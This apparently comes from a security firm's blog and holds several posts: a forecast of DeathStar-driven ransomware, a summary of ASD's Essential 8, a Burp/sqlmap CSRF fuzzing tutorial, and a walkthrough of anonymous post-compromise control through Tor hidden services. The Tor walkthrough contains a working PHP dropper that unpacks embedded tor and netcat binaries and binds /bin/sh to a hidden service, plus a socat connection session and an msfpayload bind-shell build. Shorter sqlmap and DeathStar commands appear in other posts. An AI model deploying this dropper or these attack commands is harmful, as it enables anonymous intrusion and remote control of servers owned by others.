The End is Nigh?

We are not usually in the business of making bold predictions about future developments in cyber security. But recent internal discussions about WannaCry and Petya/Nyetya have got us all thinking about an entirely plausible and frankly terrifying possibility for where crypto malware could go next.

Here’s the short version:
DeathStar + basic crypto malware variant = complete encryption of the entire AD environment.

DeathStar is an extension to the Empire post-exploitation framework that was released by byt3bl33d3r in May 2017. It builds on previous tools like BloodHound to identify and automate privilege escalation within Active Directory. Basically, “push button, receive domain admin”.

DeathStar (and BloodHound) don’t rely on exploiting any actual vulnerabilities. Rather, DeathStar leverages Active Directory configuration and the allocation of privilege to find and exploit a path through domain-joined systems that can be travelled, one hop at a time, to eventually obtain DA privileges. The BloodHound GitHub page probably explains this approach most succinctly:
“BloodHound uses graph theory to reveal hidden relationships and attack paths in an Active Directory environment.”
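For a sense of how low the bar is, running this manually looks roughly like the following sketch. The flags and the example credentials are assumptions paraphrased from the tools’ documentation at the time of writing; consult the Empire and DeathStar READMEs for the exact syntax.

```shell
# Assumed invocation -- flag names and credentials are placeholders, not
# verified against a specific release of either tool.
# 1. Start Empire with its RESTful API enabled:
./empire --rest --username empireadmin --password 'Password123'
# 2. Point DeathStar at that API; once an initial agent checks in, it
#    automates the privilege escalation path to domain admin:
python DeathStar.py -u empireadmin -p 'Password123'
```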

Our predicted scenario plays out something like this:
1. Despite your organisation’s best efforts with security education and awareness, a low privileged user opens a malicious executable email attachment.
2. The attachment first runs DeathStar, which eventually obtains domain admin privileges.
3. Once DA has been obtained, the payload reaches out to every domain-joined Windows system and executes a crypto malware payload, as DA, on every host simultaneously.

Taking this one step further…
Couple this attack with a basic password spraying attack against Remote Desktop Services or Citrix (or even OWA followed up with Ruler) and you remove the need for any phishing or other user interaction. One minute you’re fine – the next minute every machine on your AD has crypto malware.

So what can be done?

  1. Excellent, frequent, offline and offsite backups. Definitely NOT on local, online, domain-joined backup servers.
  2. Proactively test your Active Directory with tools like BloodHound and DeathStar. If you can prevent these tools from achieving DA through derivative administrator relationships, chances are good that the predicted malware won’t be able to either.
  3. Use cloud-based / SaaS services where possible.
  4. Follow ‘best practice’ advice like the Top 35 / Essential 8 provided by ASD. Specifically: patch OS and applications, implement application whitelisting, use 2FA for all remote access (including OWA), limit the allocation of administrative rights, and monitor the shit out of your environment.

If this prediction eventuates it could have staggering consequences for individual organisations and possibly for the global economy. We don’t want this to happen, but it just seems like the next logical step in the evolution of crypto malware. Hopefully by highlighting the possibility we can get ahead of the curve before the risk is realised.

Essential info on the “Essential 8”

A few days ago the Australian Signals Directorate released the new version of their document Strategies to Mitigate Cyber Security Incidents. This is the third version of this excellent guide and there are a number of obvious changes from the previous version in 2014. This year (unlike the 2014 release) ASD have chosen not to provide a summary of the key changes, so I did a quick side-by-side comparison. This post summarises the changes.

The obvious changes

There are three significant changes that have been made to this version of the document:

  1. The Top 4 is still around (and mostly the same), but now we also have the Essential 8
  2. The previous “Top 35” list of strategies is now grouped into strategies for: prevention of malware delivery and execution, limiting the extent of cyber security incidents, detecting cyber security incidents, recovering data and system availability, and preventing malicious insiders.
  3. The title has changed. The 2014 release was titled “Strategies to Mitigate Targeted Cyber Intrusions” – the new version is “Strategies to Mitigate Cyber Security Incidents”.

My take on these high level changes is that the ASD seems to be aiming for the guidelines to be more widely applicable. Instead of just talking about targeted attacks, the advice is now more relevant to a wider range of cyber security incidents.
With a more cynical hat on, perhaps they are also coming to accept that no amount of guidance is going to be truly effective in preventing a targeted cyber intrusion from a well-resourced adversary.

What’s gone

The following items from the Top 35 list no longer seem to be present:

  • 19 – Web domain whitelisting for all domains
  • 32 – Block attempts to access websites by their IP address
  • 34 – Gateway blacklisting

These seem to be fair exclusions. Web domain whitelisting is a nice idea in theory, but invasive and difficult to maintain. Blocking attempts to access websites by IP address never really seemed like it would make much difference – getting a DNS record for a C&C server is hardly a difficult task.

What’s changed

The following strategies have been significantly changed, updated or merged:

  • The previous guidance / intent of “Workstation inspection of Microsoft Office files” (29) has been transformed into a new (better) strategy for protecting against malicious Office files – “Configure Microsoft Office macro settings”
  • The previous guidance for “Workstation and server configuration management” (21) has been given a more general heading of “Operating system hardening”. This new strategy also incorporates previous guidance for “Restrict access to Server Message Block (SMB) and NetBIOS” (27).
  • “Enforce a strong passphrase policy” (25) is now incorporated into a much broader “Protect authentication credentials”.
  • The verbosely-titled strategies “Centralised and time-synchronised logging of successful and failed computer events” (15) and “Centralised and time-synchronised logging of allowed and blocked network activity” (16) have been rolled up into “Continuous incident detection and response”
  • Elements of “Centralised and time-synchronised logging of successful and failed computer events” (15) have also made their way into the new strategy for “Endpoint detection and response software”.

These updates, changes and merges all seem to make a lot of sense. Personally, I would have taken this even further – I think there are more opportunities to reduce the overall number of strategies by rolling up similar or related guidance. For example, in the strategies to prevent malware delivery and execution section we have “User application hardening” and “Configure Microsoft Office macro settings” – I would argue that the latter is a subset of the former.

What’s new

Perhaps the most interesting aspect of this year’s version of the document is the set of new entries to the list:

  • “Hunt to discover incidents” (Mitigation strategies to detect cyber security incidents and respond). This is an excellent recommendation, and it is almost baffling that this wasn’t explicitly required in previous years.
  • “Personnel management” (Mitigation strategy specific to preventing malicious insiders)

And the following three new entries under “Mitigation strategies to recover data and system availability”:

  • “Daily backups”
  • “Business continuity and disaster recovery plans”
  • “System recovery capabilities”

These last three really underline ASD’s apparent change in thinking for this year’s release – instead of just being about ‘keeping the bad guys out’, this new guide better aligns to a ‘Prevent – Detect – Respond – Recover’ incident response approach.

Closing thoughts

  1. It is great that ASD produce this guide and make it publicly available. I believe that the guidance is sound and mostly I would agree with the assigned ratings for effectiveness, impact, cost, etc.
  2. I am not a huge fan of the new groupings for the strategies. I think that this may be confusing for casual readers and non-industry types. I am concerned that a customer might work their way down the “prevent” list from top to bottom, while completely ignoring the essential strategies from “limit” and “detect”. It would be nice for ASD to release the recommendations in a format that facilitated sorting by different attributes.
  3. It is good to see the guidance updated in a way that addresses changes to the threat landscape, current attack patterns, and defensive technologies and capabilities.

Fuzzing and Sqlmap inside CSRF-protected locations (Part 2)

– @dave_au

This is part 2 of a post on fuzzing and sqlmap’ing inside web applications with CSRF protection. In part 1 I provided a walkthrough for setting up a Session Handling Rule and macro in Burp Suite for use with Burp’s Intruder. In this part, I will walk through a slightly different scenario where we use Burp as a CSRF-protection-bypass harness for sqlmap.

Sqlmap inside CSRF

A lot of the process from part 1 of the post is common to part 2. I will only run through the key differences.

Again, you’ll need to define a Session Handling Rule, containing a macro sequence that Burp will use to login to the application, and navigate to the page that you need.

The first real difference is in the definition of scope for the session handling rule. Instead of setting the scope to “Intruder” and “Include all URLs”, you’ll need to set the scope to be “Proxy” and a custom scope containing the URL that you are going to be sqlmapping.

screenshot11

There is a note to “use with caution” on the tool selection for Proxy. It is not too hard to see why – if you scoped the rule too loosely for Proxy, each request could trigger a whole new session login. And then I guess the session login could trigger a session login, and then the universe would collapse into itself. Bad news. You have been warned.

Once the session handling rule is in place, find an in-scope request that you made previously, and construct it into a sqlmap command line.

screenshot12

screenshot13

In this example, I’m attempting an injection into a RESTful URL, so I’ve manually specified the injection point with “*”. I’ve included a cookie parameter that defines the required cookies, but the actual values of the cookies are irrelevant, since Burp will replace these based on the macro.
If it were a POST, you would need to include a similar --data parameter to sqlmap, where Burp would replace any CSRF tokens from hidden form fields. Finally, we have specified a proxy for sqlmap to use (Burp).
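For readers who can’t make out the screenshots, a representative command line looks something like the sketch below. The host, path and cookie names are placeholders, not the real target; the proxy address assumes Burp is listening on its default of 127.0.0.1:8080.

```shell
# Hypothetical target -- substitute your own URL and cookie names.
# The '*' marks the injection point in the RESTful path; the cookie values
# don't matter because Burp's session handling rule rewrites them from the
# macro on every request.
sqlmap -u 'https://target.example.com/api/items/1*' \
    --cookie='ASP.NET_SessionId=x; __RequestVerificationToken=x' \
    --proxy='http://127.0.0.1:8080' --batch
```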

Running sqlmap, we start to see it doing its thing in the Burp Proxy window.

Screenshot a

That’s pretty much all there is to it.

One catch for the Session Handling Rule / macro configuration is that there isn’t a lot of evidence in the Burp tool (Intruder, Proxy, …) that anything is happening. If you are not getting the results that you would expect, the first thing to check is the Sessions Tracer, which can be found in the Session Handling Rules section. Clicking the “Open sessions tracer” button opens the Session Handling Tracer window. If a session handling rule is triggered, the actions for that rule will start to show up in the Tracer window. You can step through a macro, request by request, to see that everything is in order.

screenshot b

Conclusion

In this two part post, I’ve walked through setting up Burp Suite to do fuzzing inside CSRF-protected applications, both with Burp’s own Intruder tool and using an external tool (sqlmap).

Fuzzing and sqlmap inside CSRF-protected locations (Part 1)

– @dave_au

Hi all, David here. I was recently testing a web app for a client written in ASP.NET MVC. The developers are pretty switched on, and had used RequestValidation throughout the application in order to prevent CSRF. Further to this, in several locations, if there was a RequestValidation failure, they were destroying the current session and dropping the user back to the login form. Brutal.

I didn’t think that there would be any injection issues in the app, but I needed to test all the same and this presented an interesting challenge – how to fuzz or sqlmap on target parameters within the CSRF-protected pages of the application.

If I opted for a manual approach, the process would look like this:

  1. Login to the application
  2. Navigate to the page under test
  3. Switch Burp proxy to intercept
  4. Submit and intercept the request
  5. Alter the parameter under test in Burp, then release the request
  6. Observe results
  7. Goto 1

This would be incredibly slow and inefficient, and wouldn’t really provide a way of using external tools.

I scratched my head for a while and did some reading on Buby, Burp Extender and sqlmap tamper scripting until I finally came across an article from Carstein at 128nops which led me to further reading by Dafydd on the PortSwigger Web Security Blog. Turns out that Burp Suite can do exactly what I needed, out of the box, so I thought I’d put together a step-by-step for how I solved the problem.

Fuzzing (with Intruder) inside CSRF

Note: Intruder has built-in recursive grep functionality that can be used in some circumstances to take the CSRF token from one response and use it in the following request, and so on. This wasn’t much good to me, since the session was being destroyed if CSRF validation failed.

In Burp terminology, you need to create a Session Handling Rule to make Intruder perform a sequence of actions (login, navigate to page under test) before each request.

Go to the “Options” tab, and select the “Sessions” sub-tab. “Session Handling Rules” is right at the top.

screenshot1

Click the “Add” button to create a new Session Handling Rule. The Session Handling Rule editor window opens. Give the rule a meaningful name, then click the “Add” button for “Rule Actions” and select “Run a macro” from the drop-down.

screenshot2

This opens the Session Handling Action Editor window…

screenshot3

In this window, click the “Add” button next to “Select macro:”. This opens the Macro Editor and Macro Recorder windows (shown further on). Now that Burp is set up and waiting to record the sequence, switch over to your web browser. In a new window / session (making sure to delete any leftover session cookies), navigate to the login page, login, then navigate to the page within the application where you want to be doing fuzz testing. Once you are there, switch back over to Burp. The Macro Recorder should show the intercepted requests.

screenshot4

Select the requests that you want to use in the macro and click “OK”. This will close the Macro Recorder window.

screenshot5

In the Macro Editor window, give the macro a meaningful name and look through the “Cookies received”, “Derived Parameters” and “Preset Parameters” columns to check that Burp has analysed the sequence correctly. When you’re happy, you can test the macro out by clicking the “Test Macro” button. If everything looks alright, click “OK” to close the Macro Editor window.

screenshot6

Almost there.

Back in the Session Handling Action Editor window, you should be OK to leave the other options for updating parameters and cookies as-is. Click “OK” to exit out of here.

Now, back in the Session Handling Rule Editor window, you’ll see your macro listed in the Rule Actions…

screenshot7

Before you close this window, switch over to the “Scope” tab and alter the scope for the rule to be just for Intruder and “Include all URLs”. (If you want to be more specific, you could specify the URL that you wanted the rule to apply to, but I just put it in scope for all of Intruder, and remember to turn the rule off when I’m not using it. This becomes more important in Part 2 of this post.) Then close the Session Handling Rule Editor window.

screenshot8

Your session handling rule is now defined.

Next, go back over to Burp’s proxy and send the request that you want to fuzz over to Intruder in the usual way.

screenshot9

In Intruder’s “Positions” tab, you’ll want to clear all of the injection points except for the one that you want to specifically fuzz test. Session cookies and any CSRF tokens (in cookies or hidden form fields) will be populated automatically by Intruder from the macro sequence.

screenshot10

Set your payloads and other options as required. If the application is sensitive to multiple concurrent sessions for the same user, you will need to reduce the number of threads to 1 in the “Options” tab.

Then start Intruder. You will almost certainly notice that Intruder runs slowly; this is to be expected when you consider that it is going through a new login sequence for each request.

To fuzz different parameters on the same page, just go back into “Positions” and choose the next target.

To fuzz parameters on a different page, you will probably need to go back into your Session Handling Rule and edit your macro (or define a new macro) that logs in and navigates to the new target page.

In part 2 of this post, I’ll step through a slightly different scenario where we use an external tool (sqlmap), proxied through Burp, with a Session Handling rule running on Burp’s Proxy.

Anonymous post-compromise control via Tor hidden services

Hi all, David here.  This post has been quite a long time coming.  The idea has been brewing in the back of my mind for a good six months and I’ve just been waiting until I had some spare cycles to write it up and post it.  Yay for Christmas and the holiday season!

I expect that this is going to be a relatively lengthy post.  If you can’t spare the time, see the TLDR at the bottom.

So, I can imagine certain scenarios where it would be highly desirable to remain anonymous when compromising and exerting post-compromise control over target systems on the Internet.  Setting aside any black-hat motivations, I expect that law enforcement agencies and offensive cyber operations teams require effective anonymity at various times.  This led me to thinking about methods for post-compromise control of targets that are both:

a) Useful, and
b) Anonymous.

For the sake of simplicity, let’s say that the target system is a web server on the Internet.  Pre-compromise activities (information gathering, application mapping, etc.) and actual exploitation would be relatively easy to achieve with anonymity using the Tor anonymisation network.  However, once the system is compromised, your options for post-compromise command & control introduce some challenges to maintaining anonymity.

Broadly, the options that I can see for post-compromise control are:

  1. In-band control (within the HTTP or HTTPS service) – The most obvious example here would be to load a PHP shell onto the compromised system, and perform C&C through this.
  2. Out-of-band forward connection – You install a trojan service onto the compromised system, listening on a different unused network port (eg. Metasploit bind_tcp payloads).  This still lets you use Tor for C&C, but virtually every real world system will have some form of firewall in place which will prevent you from connecting to arbitrary listening ports.
  3. Out-of-band reverse connection – You install a trojan service onto the compromised system; the Trojan establishes an outbound connection to your C&C server (eg. Metasploit reverse_tcp and reverse_http payloads).  This is more likely to succeed against perimeter firewalls, but is a significant challenge to anonymity – you need to have a known IP address for the trojan to connect back to.

Option 1 isn’t a bad choice, but let’s be honest – web shells mostly suck.  They might be OK for rudimentary post-compromise activities, but I don’t think that they meet the primary requirement of being truly useful.  They don’t give you an interactive shell with job control and all of the nice stuff, let alone more advanced desirable features like port forwarding and application or network pivoting.

Option 2 is generally not practical due to pervasive firewalling, and Option 3 breaks the second primary requirement of maintaining anonymity.

The answer that I arrived at is to leverage Tor hidden services on the compromised host.

The assumed pre-requisites for this method of anonymous, useful, post-compromise control are as follows:

  1. You have already compromised the system, and you are able to upload and execute arbitrary code (doesn’t necessarily need to be privileged execution);
  2. The compromised system is able to establish an outbound connection to the Tor network.  This isn’t too much of a stretch; I’ve seen a lot of DMZ infrastructure and hosted websites that have more or less unrestricted egress access for grabbing automatic updates or to facilitate administration.

The steps go like this:

  1. Upload your required trojan or network service and bind it to an unused port on the localhost interface (bind_tcp).
  2. Upload a Tor client with a hidden services configuration and run it.  The client establishes a connection to the Tor network, and sets up the hidden service, redirecting to the trojan listener that you set up in step 1.
  3. From your workstation, establish a connection to the Tor network and connect to the published hidden service.  Egress becomes ingress and you are able to establish an out-of-band forward connection, with anonymity, straight through the target’s firewall.
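Concretely, on a Linux target the first two steps reduce to something like the following sketch. The /tmp paths and torrc contents mirror the dropper.php payload shown later in the Netcat example; the tor and nc binaries are assumed to have been uploaded to the host already.

```shell
# Step 1: bind a shell to an unused port, listening on the host itself
# (no firewall exception needed -- traffic arrives via the Tor circuit).
/tmp/nc -l -p 2222 -e /bin/sh >/dev/null 2>&1 &

# Step 2: point Tor at a hidden-service configuration and let it publish
# a .onion service that redirects to the listener from step 1.
cat > /tmp/torrc <<'EOF'
SocksPort 9050
SocksListenAddress 127.0.0.1
DataDirectory /tmp/.tor
HiddenServiceDir /tmp/hidden/
HiddenServicePort 2222 127.0.0.1:2222
EOF
/tmp/tor -f /tmp/torrc >/tmp/log 2>&1 &

# Step 3 happens on the attacker's workstation: connect to the published
# .onion address over Tor (e.g. via socat, as shown in the examples below).
```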

Hidden Services diagram

The choice of network service that you install on the compromised host is limited only by your imagination.  Some options might include:

  • A netcat listener bound to a shell;
  • A customised SSH daemon;
  • A Meterpreter payload;
  • A SOCKS daemon, providing an application proxy pivot onto the target network;
  • An OpenVPN daemon, providing network-layer pivot capability onto the target network.

One small obstacle that makes this process a little more difficult is the fact that a LOT of client applications don’t natively support connecting via SOCKS, or they implement SOCKS poorly in relation to name resolution.  In order to access a hidden service on Tor, the client needs to be able to use the SOCKS proxy server provided by the Tor client, and the client needs to defer name resolution to the SOCKS server.  To imbue non-SOCKS-enabled clients with SOCKS capability, you need to look to an additional tool like torify or socat.

The examples below show the process from end-to-end both for a Netcat shell listener, and also for a metasploit bind_tcp shell.  Both examples utilise socat to enable the client to connect to the published hidden service.

Example 1 – Netcat shell listener

Step 1 – Tor hidden service pre-configuration

Tor hidden services, identified by “.onion” pseudo-TLD addresses, are linked to a private key.  If you move the private key from one Tor client to another, the hidden service definition follows.  In order to know the hidden service address that you’ll be using for post-compromise control, it is necessary to generate the private key and matching hostname ahead of time.  So we create a very simple torrc file and generate a new private key and hostname…

david@GTFO:~$ 
david@GTFO:~$ cd torcontrol/
david@GTFO:~/torcontrol$ ls -l
total 1232
-rwxr-xr-x 1 david david 1254312 Dec 24 13:13 tor
-rw-rw-r-- 1 david david     141 Dec 24 13:14 torrc
david@GTFO:~/torcontrol$ cat torrc
SocksPort 9050
SocksListenAddress 127.0.0.1
#HiddenServiceDir /var/tmp/tor/
HiddenServiceDir ./hidden/
HiddenServicePort 2222 127.0.0.1:2222
david@GTFO:~/torcontrol$ ./tor -f ./torrc
Dec 24 13:16:45.497 [notice] Tor v0.2.2.37. This is experimental software. Do not rely on it for strong anonymity. (Running on Linux x86_64)
Dec 24 13:16:45.497 [notice] Initialized libevent version 2.0.16-stable using method epoll. Good.
Dec 24 13:16:45.498 [notice] Opening Socks listener on 127.0.0.1:9050
Dec 24 13:16:45.552 [notice] OpenSSL OpenSSL 1.0.1 14 Mar 2012 looks like version 0.9.8m or later; I will try SSL_OP to enable renegotiation
Dec 24 13:16:45.608 [warn] Please upgrade! This version of Tor (0.2.2.37) is obsolete, according to the directory authorities. Recommended versions are: 0.2.2.39,0.2.3.24-rc,0.2.3.25,0.2.4.5-alpha,0.2.4.6-alpha
Dec 24 13:16:45.794 [notice] We now have enough directory information to build circuits.
Dec 24 13:16:45.794 [notice] Bootstrapped 80%: Connecting to the Tor network.
Dec 24 13:16:47.087 [notice] Bootstrapped 85%: Finishing handshake with first hop.
Dec 24 13:16:49.129 [notice] Bootstrapped 90%: Establishing a Tor circuit.
Dec 24 13:16:51.813 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
Dec 24 13:16:51.813 [notice] Bootstrapped 100%: Done.
^CDec 24 13:16:59.010 [notice] Interrupt: exiting cleanly.
david@GTFO:~/torcontrol$ ls -l
total 1236
drwx------ 2 david david    4096 Dec 24 13:16 hidden
-rwxr-xr-x 1 david david 1254312 Dec 24 13:13 tor
-rw-rw-r-- 1 david david     141 Dec 24 13:14 torrc
david@GTFO:~/torcontrol$ cd hidden
david@GTFO:~/torcontrol/hidden$ ls -l
total 8
-rw------- 1 david david  23 Dec 24 13:16 hostname
-rw------- 1 david david 887 Dec 24 13:16 private_key
david@GTFO:~/torcontrol/hidden$ cat hostname
zcbvswdhpmb7mkgq.onion
david@GTFO:~/torcontrol/hidden$

Step 2 – Construct a payload to upload to the compromised system

This stage will vary from server to server, and depending on what service you want to run on the compromised system.  My target system is a Linux server, running Apache with PHP.  The payload bundle contains everything that will be required to establish the Tor hidden service, as well as my required trojan.

Caveat: I am not a coder.  This is a hideous hack in order to achieve my requirement.  I am certain that there are hundreds of more elegant ways of achieving the same net result.

Payload “dropper.php” follows:

<?php
$str = 'H4sICB3s11AAA3RvcgCMWwmYHFW1vplMkh6yJ5CwBEg0wOCDkAxJTBA124Ssk3GSQBCw0tNdPVNM
--snip--
pi6xDt9HxLYaXBDOH6QbsXS8/QtvoE3uQMUSAA==';
$handle = fopen("/tmp/tor.gz", "w+");
fwrite($handle,base64_decode($str));
fclose($handle);
shell_exec('gunzip /tmp/tor.gz');
shell_exec('chmod 755 /tmp/tor');

$str = 'SocksPort 9050
SocksListenAddress 127.0.0.1
DataDirectory /tmp/.tor
HiddenServiceDir /tmp/hidden/
HiddenServicePort 2222 127.0.0.1:2222
';
$handle = fopen("/tmp/torrc", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('mkdir /tmp/hidden');
shell_exec('chmod 700 /tmp/hidden');

$str = 'zcbvswdhpmb7mkgq.onion';
$handle = fopen("/tmp/hidden/hostname", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('chmod 600 /tmp/hidden/hostname');

$str = '-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDB9xZuO4chidB4S4sdZZH7XRIj/7slR6NCxs9kIWnzA9pFF1aR
--snip--
MmaQ/2PM26I1EwSxqLi33RdrwBgPdTMODx3VGAxinA==
-----END RSA PRIVATE KEY-----';
$handle = fopen("/tmp/hidden/private_key", "w+");
fwrite($handle,$str);
fclose($handle);
shell_exec('chmod 600 /tmp/hidden/private_key');
system('/tmp/tor -f /tmp/torrc >/tmp/log 2>&1 &');
sleep(5);

$str = 'H4sICC/s11AAA25jAO18fXhU1bX3mckEJhicqFBRUY82FFASCaJCCBo+RvHKl0oqLUScZGaYKZOZ
--snip--
PPT/QlZ/+NZW7yD9Ib2UhQdfcJzwegbB25SF19lps3cu7P+9TrPvN+T4TN9BmsetijLbksFTZb5N
6f+dSOCNyIItWXmWeigTCe/tQfD+H9c9M+o8VgAA';
$handle = fopen("/tmp/nc.gz", "w+");
fwrite($handle,base64_decode($str));
fclose($handle);
shell_exec('gunzip /tmp/nc.gz');
shell_exec('chmod 755 /tmp/nc');
system('/tmp/nc -l -p 2222 -e /bin/sh >/dev/null 2>&1 &');
print("Done!");
?>

Step 3 – Upload the payload bundle to the web server

Using your Tor-enabled web browser, first check that Tor is active…

Screenshot1

Then navigate to the target system…

Screenshot2

And using the vulnerable file upload facility, upload your payload…

screenshot3

Step 4 – Execute your payload on the web server

There’s not too much to see here from the attacker’s perspective, so I’ve illustrated this with some behind-the-scenes information from the web server.  Here’s the situation before the upload:

root@ip-10-128-69-141:/var/www# ls -l
total 12
-rw-r--r-- 1 www-data www-data  66 2013-01-10 06:58 index.html
-rw-r--r-- 1 www-data www-data 358 2012-12-24 06:23 uploader.php
-rw-r--r-- 1 www-data www-data 332 2012-12-24 06:15 upload.html
root@ip-10-128-69-141:/var/www#

And the same listing after we’ve uploaded the payload:

root@ip-10-128-69-141:/var/www# ls -l
total 724
-rw-r--r-- 1 www-data www-data 722088 2013-01-10 07:03 dropper.php
-rw-r--r-- 1 www-data www-data     66 2013-01-10 06:58 index.html
-rw-r--r-- 1 www-data www-data    358 2012-12-24 06:23 uploader.php
-rw-r--r-- 1 www-data www-data    332 2012-12-24 06:15 upload.html
root@ip-10-128-69-141:/var/www#

Before we run the payload, this is what the system looks like:

root@ip-10-128-69-141:/var/www# ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
root@ip-10-128-69-141:/var/www# ls -la /tmp
total 8
drwxrwxrwt  2 root root 4096 2013-01-10 07:07 .
drwxr-xr-x 21 root root 4096 2013-01-10 06:39 ..
root@ip-10-128-69-141:/var/www#

No unusual processes, and nothing fun in /tmp.
Then we run the payload container from the browser…

Screenshot4

…which unpacks our files and executes them, resulting in the following:

root@ip-10-128-69-141:/var/www# ls -la /tmp
total 1260
drwxrwxrwt  4 root     root        4096 2013-01-10 07:09 .
drwxr-xr-x 21 root     root        4096 2013-01-10 06:39 ..
drwx------  2 www-data www-data    4096 2013-01-10 07:08 hidden
-rw-r--r--  1 www-data www-data    4434 2013-01-10 07:09 log
-rwxr-xr-x  1 www-data www-data   22076 2013-01-10 07:08 nc
-rwxr-xr-x  1 www-data www-data 1230144 2013-01-10 07:08 tor
drwx------  2 www-data www-data    4096 2013-01-10 07:09 .tor
-rw-r--r--  1 www-data www-data     136 2013-01-10 07:08 torrc
root@ip-10-128-69-141:/var/www# ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1446   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1522   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1523   602  0 06:34 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1568   602  0 06:37 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1915     1  6 07:08 ?        00:00:04 /tmp/tor -f /tmp/torrc
www-data  1921     1  0 07:08 ?        00:00:00 /tmp/nc -l -p 2222 -e /bin/sh
root@ip-10-128-69-141:/var/www#

Step 5 – Connect to the hidden service

Finally, we are ready to connect to the hidden service to gain access to the trojan.  Allow a couple of minutes from when the payload is first run, as it can sometimes take a while for Tor to bootstrap itself, and for the hidden service to register in the Tor directory.

In shell #1, start up socat…

$ socat TCP4-LISTEN:2222 SOCKS4a:127.0.0.1:zcbvswdhpmb7mkgq.onion:2222,socksport=9050

Then, in shell #2, connect to the socat listener…

$ nc 127.0.0.1 2222
ls -la
total 760
drwxr-xr-x  4 root     www-data   4096 Jan 10 06:40 .
drwxr-xr-x 15 root     root       4096 Jun 29  2011 ..
-rw-r--r--  1 www-data www-data 722072 Jan 10 06:40 dropper.php
-rw-r--r--  1 www-data www-data     30 May 28  2012 index.html
-rw-r--r--  1 www-data www-data    332 Dec 24 06:15 upload.html
-rw-r--r--  1 www-data www-data    358 Dec 24 06:23 uploader.php
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
hostname
ip-10-128-69-141
/sbin/ifconfig -a
eth0      Link encap:Ethernet  HWaddr 12:31:40:00:46:63
          inet addr:10.128.69.141  Bcast:10.128.69.255  Mask:255.255.255.0
          inet6 addr: fe80::1031:40ff:fe00:4663/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:42289 errors:0 dropped:0 overruns:0 frame:0
          TX packets:29494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:29078650 (29.0 MB)  TX bytes:8783815 (8.7 MB)
          Interrupt:246

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:242 errors:0 dropped:0 overruns:0 frame:0
          TX packets:242 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:23980 (23.9 KB)  TX bytes:23980 (23.9 KB)
echo Giddyup\!
Giddyup!
^C
$

Example 2 – Metasploit bind shell

Step 1 – Tor hidden service pre-configuration

As above.

Step 2 – Construct a payload to upload to the compromised system

Mostly as above.  Instead of the netcat binary, this time we build a staged Metasploit bind shell payload, as follows…
root@GTFO:~/torcontrol# msfpayload linux/x86/shell/bind_tcp LPORT=2222 X > msfshell.bin
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/bind_tcp
 Length: 79
Options: {"LPORT"=>"2222"}
root@GTFO:~/torcontrol# ls -l msfshell.bin
-rw-r--r-- 1 root root 163 Jan 10 15:29 msfshell.bin
root@GTFO:~/torcontrol#
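
Note that the file on disk (163 bytes) is larger than the payload itself (79 bytes): the `X` output format wraps the raw shellcode in a minimal ELF executable so it can be run directly on the target.  A quick sanity check of such a binary might parse just the start of the ELF header (the helper name and field selection are my own illustration):

```python
import struct

def elf_summary(data: bytes) -> dict:
    """Parse just enough of an ELF32 header to sanity-check a payload binary."""
    assert data[:4] == b"\x7fELF", "not an ELF file"
    ei_class = data[4]                               # 1 = 32-bit, 2 = 64-bit
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    e_entry = struct.unpack_from("<I", data, 24)[0]  # entry point address
    return {
        "class": {1: "ELF32", 2: "ELF64"}[ei_class],
        "type": e_type,        # 2 = ET_EXEC (executable)
        "machine": e_machine,  # 3 = EM_386 (x86)
        "entry": hex(e_entry),
    }
```

For a `linux/x86/shell/bind_tcp` binary built as above we would expect an ELF32, x86, executable-type header.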

This then gets built into payload.php.
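
The bundling step follows the same pattern as before: embed the binary in the dropper in a text-safe encoding so it can be uploaded through the web form.  A minimal sketch (the file names, marker string, and template format here are assumptions for illustration, not the exact layout of payload.php):

```python
import base64

def bundle(binary_path: str, template: str, marker: str = "{{PAYLOAD_B64}}") -> str:
    """Substitute a base64-encoded binary into a dropper template.

    Shipping the binary base64-encoded keeps the bundle plain text,
    which survives upload forms and text-mode transfers intact; the
    dropper decodes and writes it back out at run time.
    """
    with open(binary_path, "rb") as f:
        b64 = base64.b64encode(f.read()).decode("ascii")
    return template.replace(marker, b64)
```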

Step 3 – Upload the payload bundle to the web server

As above.

Step 4 – Execute your payload on the web server

As above.  The filesystem objects and process listing will obviously be slightly different…

$ ps -ef | grep www-data
www-data  1440   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1441   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1443   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
www-data  1445   602  0 06:25 ?        00:00:00 /usr/sbin/apache2 -k start
